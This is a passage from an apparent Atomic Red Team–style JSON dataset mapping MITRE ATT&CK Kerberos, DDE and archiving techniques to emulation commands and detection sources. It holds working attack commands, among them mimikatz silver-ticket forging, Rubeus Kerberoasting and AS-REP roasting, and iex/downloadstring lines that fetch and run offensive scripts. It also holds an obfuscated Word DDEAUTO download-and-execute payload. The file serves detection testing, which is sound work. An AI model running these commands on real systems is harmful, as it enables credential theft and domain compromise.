$krbtgtSID = (New-Object Security.Principal.NTAccount $domain\\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value\n $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))\n}\n\n# create batch file with commands to run in a separate \"runas /netonly\" session\n# so we don't purge Kerberos ticket from the current Windows session\n# its output goes to silver.txt temp file, because we cannot capture \"runas /netonly\" output otherwise\n@\"\n>%TEMP%\\silver.txt 2>&1 (\n echo Purge existing tickets and create silver ticket:\n klist purge\n #{mimikatz_path} \"kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt\" \"exit\"\n\n echo.\n echo executing:schtasks /query /S #{target}.#{domain}\n schtasks /query /S #{target}.#{domain}\n \n 
echo.\n echo Tickets after requesting schtasks:\n klist\n\n echo.\n echo End of Silver Ticket attack\n)\n\"@ -Replace \"DOMAIN_SID\", $domain_sid | Out-File -Encoding OEM $env:TEMP\\silver.bat\n\n# run batch file in a new empty session (password and username do not matter)\necho \"foo\" | runas /netonly /user:fake \"$env:TEMP\\silver.bat\" | Out-Null\n\n# wait until the output file has logged the entire attack\ndo {\n Start-Sleep 1 # wait a bit so the output file has time to be created\n Get-Content -Path \"$env:TEMP\\silver.txt\" -Wait | ForEach-Object {\n if ($_ -match 'End of Silver Ticket attack') { break } \n }\n} while ($false) # dummy loop so that 'break' can be used\n\n# show output from new empty session\nGet-Content $env:TEMP\\silver.txt\n\n# cleanup temp files\nRemove-Item $env:TEMP\\silver.bat -ErrorAction Ignore\nRemove-Item $env:TEMP\\silver.txt -ErrorAction Ignore\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session metadata", + "description": "Data and information that describe a logon session (such as logon type) and activity within it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "logon session" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1558.003", + "command_list": [ + "[Net.ServicePointManager]::SecurityProtocol = 
[Net.SecurityProtocolType]::Tls12\niex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)\nInvoke-Kerberoast | fl\n", + "klist purge\ncmd.exe /c \"$Env:temp\\#{local_executable}\" kerberoast #{flags} /outfile:\"$Env:temp\\#{out_file}\"\n", + "klist purge\ncmd.exe /c \"#{local_folder}\\rubeus.exe\" kerberoast #{flags} /outfile:\"#{local_folder}\\#{out_file}\"\n", + "klist purge\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" kerberoast #{flags} /outfile:\"#{local_folder}\\rubeus_output.txt\"\n", + "klist purge\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" kerberoast #{flags} /outfile:\"#{local_folder}\\#{out_file}\"\n", + null, + "setspn -T %USERDNSDOMAIN% -Q */*\n", + "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \"HTTP/$ComputerFQDN\" \n", + "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T %USERDNSDOMAIN% -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } \n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nKerberoasting -consoleoutput -noninteractive", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')\nInvoke-Rubeus -Command \"kerberoast /format:hashcat /nowrap\"" + ], + "commands": [ + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\niex(iwr 
https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)\nInvoke-Kerberoast | fl\n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "klist purge\ncmd.exe /c \"$Env:temp\\#{local_executable}\" kerberoast #{flags} /outfile:\"$Env:temp\\#{out_file}\"\n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "klist purge\ncmd.exe /c \"#{local_folder}\\rubeus.exe\" kerberoast #{flags} /outfile:\"#{local_folder}\\#{out_file}\"\n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "klist purge\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" kerberoast #{flags} /outfile:\"#{local_folder}\\rubeus_output.txt\"\n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "klist purge\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" kerberoast #{flags} /outfile:\"#{local_folder}\\#{out_file}\"\n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": null, + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "setspn -T %USERDNSDOMAIN% -Q */*\n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object 
System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \"HTTP/$ComputerFQDN\" \n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T %USERDNSDOMAIN% -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } \n", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nKerberoasting -consoleoutput -noninteractive", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')\nInvoke-Rubeus -Command \"kerberoast /format:hashcat /nowrap\"", + "source": "atomics/T1558.003/T1558.003.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: Kerberoasting" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1558.003", + "display_name": "Steal or Forge Kerberos Tickets: Kerberoasting", + "atomic_tests": [ + { + "name": "Request for service tickets", + "auto_generated_guid": "3f987809-3681-43c8-bcd8-b3ff3a28533a", + "description": "This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1\nThe following are further sources and credits for this attack:\n[Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)\n[Invoke-Kerberoast source] 
(https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)\nwhen executed successfully , the test displays available services with their hashes. \nIf the testing domain doesn't have any service principal name configured, there is no output\n", + "supported_platforms": [ + "windows" + ], + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\niex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)\nInvoke-Kerberoast | fl\n", + "name": "powershell" + } + }, + { + "name": "Rubeus kerberoast", + "auto_generated_guid": "14625569-6def-4497-99ac-8e7817105b55", + "description": "Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast\nThis build targets .NET 4.5. 
If targeting a different version you will need to compile Rubeus\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "local_folder": { + "description": "Local path of Rubeus executable", + "type": "Path", + "default": "$Env:temp" + }, + "local_executable": { + "description": "name of the rubeus executable", + "type": "String", + "default": "rubeus.exe" + }, + "out_file": { + "description": "file where command results are stored", + "type": "String", + "default": "rubeus_output.txt" + }, + "rubeus_url": { + "description": "URL of Rubeus executable", + "type": "Url", + "default": "https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe" + }, + "flags": { + "description": "command flags you would like to run (optional and blank by default)", + "type": "String", + "default": null + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + }, + { + "description": "Rubeus must exist\n", + "prereq_command": "if(Test-Path -Path #{local_folder}\\#{local_executable}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\\#{local_executable}\n" + } + ], + "executor": { + "command": "klist purge\ncmd.exe /c \"#{local_folder}\\#{local_executable}\" kerberoast #{flags} /outfile:\"#{local_folder}\\#{out_file}\"\n", + "cleanup_command": "Remove-Item #{local_folder}\\#{out_file} -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Extract all accounts in use as SPN using setspn", + "auto_generated_guid": "e6f4affd-d826-4871-9a62-6c9004b8fe06", + "description": "The following test will utilize setspn to extract the Service 
Principal Names. This behavior is typically used during a kerberos or silver ticket attack. \nA successful execution will output all the SPNs for the related domain. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain_name": { + "description": "The Domain Name to lookup against", + "type": "String", + "default": "%USERDNSDOMAIN%" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": "setspn -T #{domain_name} -Q */*\n", + "name": "command_prompt" + } + }, + { + "name": "Request A Single Ticket via PowerShell", + "auto_generated_guid": "988539bc-2ed7-4e62-aec6-7c5cf6680863", + "description": "The following test will utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. 
\nA successful execution will output the SPNs for the endpoint in question.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \"HTTP/$ComputerFQDN\" \n", + "name": "powershell" + } + }, + { + "name": "Request All Tickets via PowerShell", + "auto_generated_guid": "902f4ed2-1aba-4133-90f2-cff6d299d6da", + "description": "The following test will utilize native PowerShell Identity modules to query the domain to extract allthe Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. 
\nA successful execution will output the SPNs for the domain in question.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "domain_name": { + "description": "The Domain Name to lookup against", + "type": "String", + "default": "%USERDNSDOMAIN%" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } \n", + "name": "powershell" + } + }, + { + "name": "WinPwn - Kerberoasting", + "auto_generated_guid": "78d10e20-c874-45f2-a9df-6fea0120ec27", + "description": "Kerberoasting technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nKerberoasting -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - PowerSharpPack - Kerberoasting Using Rubeus", + "auto_generated_guid": "29094950-2c96-4cbd-b5e4-f7c65079678f", + "description": "PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')\nInvoke-Rubeus -Command \"kerberoast /format:hashcat 
/nowrap\"", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1558.004", + "command_list": [ + "cmd.exe /c \"$Env:temp\\#{local_executable}\" asreproast /outfile:\"$Env:temp\\#{out_file}\"\n", + "cmd.exe /c \"#{local_folder}\\rubeus.exe\" asreproast /outfile:\"#{local_folder}\\#{out_file}\"\n", + "cmd.exe /c \"#{local_folder}\\#{local_executable}\" asreproast /outfile:\"#{local_folder}\\rubeus_output.txt\"\n", + "cmd.exe /c \"#{local_folder}\\#{local_executable}\" asreproast /outfile:\"#{local_folder}\\#{out_file}\"\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose\n", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')\nInvoke-Rubeus -Command \"asreproast /format:hashcat /nowrap\"" + ], + "commands": [ + { + "command": "cmd.exe /c \"$Env:temp\\#{local_executable}\" asreproast /outfile:\"$Env:temp\\#{out_file}\"\n", + "source": 
"atomics/T1558.004/T1558.004.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: AS-REP Roasting" + }, + { + "command": "cmd.exe /c \"#{local_folder}\\rubeus.exe\" asreproast /outfile:\"#{local_folder}\\#{out_file}\"\n", + "source": "atomics/T1558.004/T1558.004.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: AS-REP Roasting" + }, + { + "command": "cmd.exe /c \"#{local_folder}\\#{local_executable}\" asreproast /outfile:\"#{local_folder}\\rubeus_output.txt\"\n", + "source": "atomics/T1558.004/T1558.004.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: AS-REP Roasting" + }, + { + "command": "cmd.exe /c \"#{local_folder}\\#{local_executable}\" asreproast /outfile:\"#{local_folder}\\#{out_file}\"\n", + "source": "atomics/T1558.004/T1558.004.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: AS-REP Roasting" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose\n", + "source": "atomics/T1558.004/T1558.004.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: AS-REP Roasting" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')\nInvoke-Rubeus -Command \"asreproast /format:hashcat /nowrap\"", + "source": "atomics/T1558.004/T1558.004.yaml", + "name": "Atomic Red Team Test - Steal or Forge Kerberos Tickets: AS-REP Roasting" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1558.004", + "display_name": "Steal or Forge Kerberos Tickets: AS-REP Roasting", + "atomic_tests": [ + { + "name": "Rubeus asreproast", + "auto_generated_guid": 
"615bd568-2859-41b5-9aed-61f6a88e48dd", + "description": "Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast\nThis build targets .NET 4.5. If targeting a different version you will need to compile Rubeus\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "local_folder": { + "description": "Local path of Rubeus executable", + "type": "Path", + "default": "$Env:temp" + }, + "local_executable": { + "description": "name of the rubeus executable", + "type": "String", + "default": "rubeus.exe" + }, + "out_file": { + "description": "file where command results are stored", + "type": "String", + "default": "rubeus_output.txt" + }, + "rubeus_url": { + "description": "URL of Rubeus executable", + "type": "Url", + "default": "https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + }, + { + "description": "Rubeus must exist\n", + "prereq_command": "if(Test-Path -Path #{local_folder}\\#{local_executable}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\\#{local_executable}\n" + } + ], + "executor": { + "command": "cmd.exe /c \"#{local_folder}\\#{local_executable}\" asreproast /outfile:\"#{local_folder}\\#{out_file}\"\n", + "cleanup_command": "Remove-Item #{local_folder}\\#{out_file} -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Get-DomainUser with PowerView", + "auto_generated_guid": "d6139549-7b72-4e48-9ea1-324fc9bdf88a", + "description": "Utilizing PowerView, run Get-DomainUser to identify 
domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose\n", + "name": "powershell" + } + }, + { + "name": "WinPwn - PowerSharpPack - Kerberoasting Using Rubeus", + "auto_generated_guid": "8c385f88-4d47-4c9a-814d-93d9deec8c71", + "description": "PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')\nInvoke-Rubeus -Command \"asreproast /format:hashcat /nowrap\"", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1559.002", + "command_list": [ + "start $PathToAtomicsFolder\\T1559.002\\bin\\DDE_Document.docx\n" + ], + "commands": [ + 
{ + "command": "start $PathToAtomicsFolder\\T1559.002\\bin\\DDE_Document.docx\n", + "source": "atomics/T1559.002/T1559.002.yaml", + "name": "Atomic Red Team Test - Inter-Process Communication: Dynamic Data Exchange" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1559.002", + "display_name": "Inter-Process Communication: Dynamic Data Exchange", + "atomic_tests": [ + { + "name": "Execute Commands", + "auto_generated_guid": "f592ba2a-e9e8-4d62-a459-ef63abd819fd", + "description": "Executes commands via DDE using Microsfot Word\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "steps": "Open Microsoft Word\n\nInsert tab -> Quick Parts -> Field\n\nChoose = (Formula) and click ok.\n\nAfter that, you should see a Field inserted in the document with an error \"!Unexpected End of Formula\", right-click the Field, and choose Toggle Field Codes.\n\nThe Field Code should now be displayed, change it to Contain the following:\n\n{DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe \"/k calc.exe\" }\n", + "name": "manual" + } + }, + { + "name": "Execute PowerShell script via Word DDE", + "auto_generated_guid": "47c21fb6-085e-4b0d-b4d2-26d72c3830b3", + "description": "When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "start $PathToAtomicsFolder\\T1559.002\\bin\\DDE_Document.docx\n", + "name": "command_prompt" + } + }, + { + "name": "DDEAUTO", + "auto_generated_guid": "cf91174c-4e74-414e-bec0-8d60a104d181", + "description": "\nTrustedSec - Unicorn - https://github.com/trustedsec/unicorn\n\nSensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/\n\nWord VBA Macro\n\n[Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)\n", + "supported_platforms": [ + "windows" + ], + "executor": { + 
"steps": "1. Open Word\n\n2. Insert tab -> Quick Parts -> Field\n\n3. Choose = (Formula) and click ok.\n\n4. Once the field is inserted, you should now see \"!Unexpected End of Formula\"\n\n5. Right-click the Field, choose \"Toggle Field Codes\"\n\n6. Paste in the code from Unicorn or SensePost\n\n7. Save the Word document.\n\n9. DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe \"/k calc.exe\"\n\n10. DDEAUTO \"C:\\\\Programs\\\\Microsoft\\\\Office\\\\MSWord\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\system32\\\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\\\v1.0\\\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http:///download.ps1'); # \" \"Microsoft Document Security Add-On\"\n", + "name": "manual" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + 
"definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", 
+ "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1560.001", + "command_list": [ + "\"#{rar_exe}\" a -r #{output_file} %USERPROFILE%\\*#{file_extension}\n", + "\"#{rar_exe}\" a -r #{output_file} #{input_path}\\*.txt\n", + "\"#{rar_exe}\" a -r %USERPROFILE%\\T1560.001-data.rar #{input_path}\\*#{file_extension}\n", + "\"#{rar_exe}\" a -r #{output_file} #{input_path}\\*#{file_extension}\n", + "\"%programfiles%/WinRAR/Rar.exe\" a -r #{output_file} #{input_path}\\*#{file_extension}\n", + "mkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{rar_exe}\" a -hp\"blue\" hello.rar\ndir\n", + "mkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"%programfiles%/WinRAR/Rar.exe\" a -hp\"blue\" hello.rar\ndir\n", + "path=%path%;\"C:\\Program Files (x86)\\winzip\"\nmkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"%ProgramFiles%\\WinZip\\winzip64.exe\" -min -a -s\"hello\" archive.zip *\ndir\n", + "path=%path%;\"C:\\Program Files (x86)\\winzip\"\nmkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{winzip_exe}\" -min -a -s\"hello\" archive.zip *\ndir\n", + "mkdir $PathToAtomicsFolder\\T1560.001\\victim-files\ncd $PathToAtomicsFolder\\T1560.001\\victim-files\necho \"This file will be encrypted\" > 
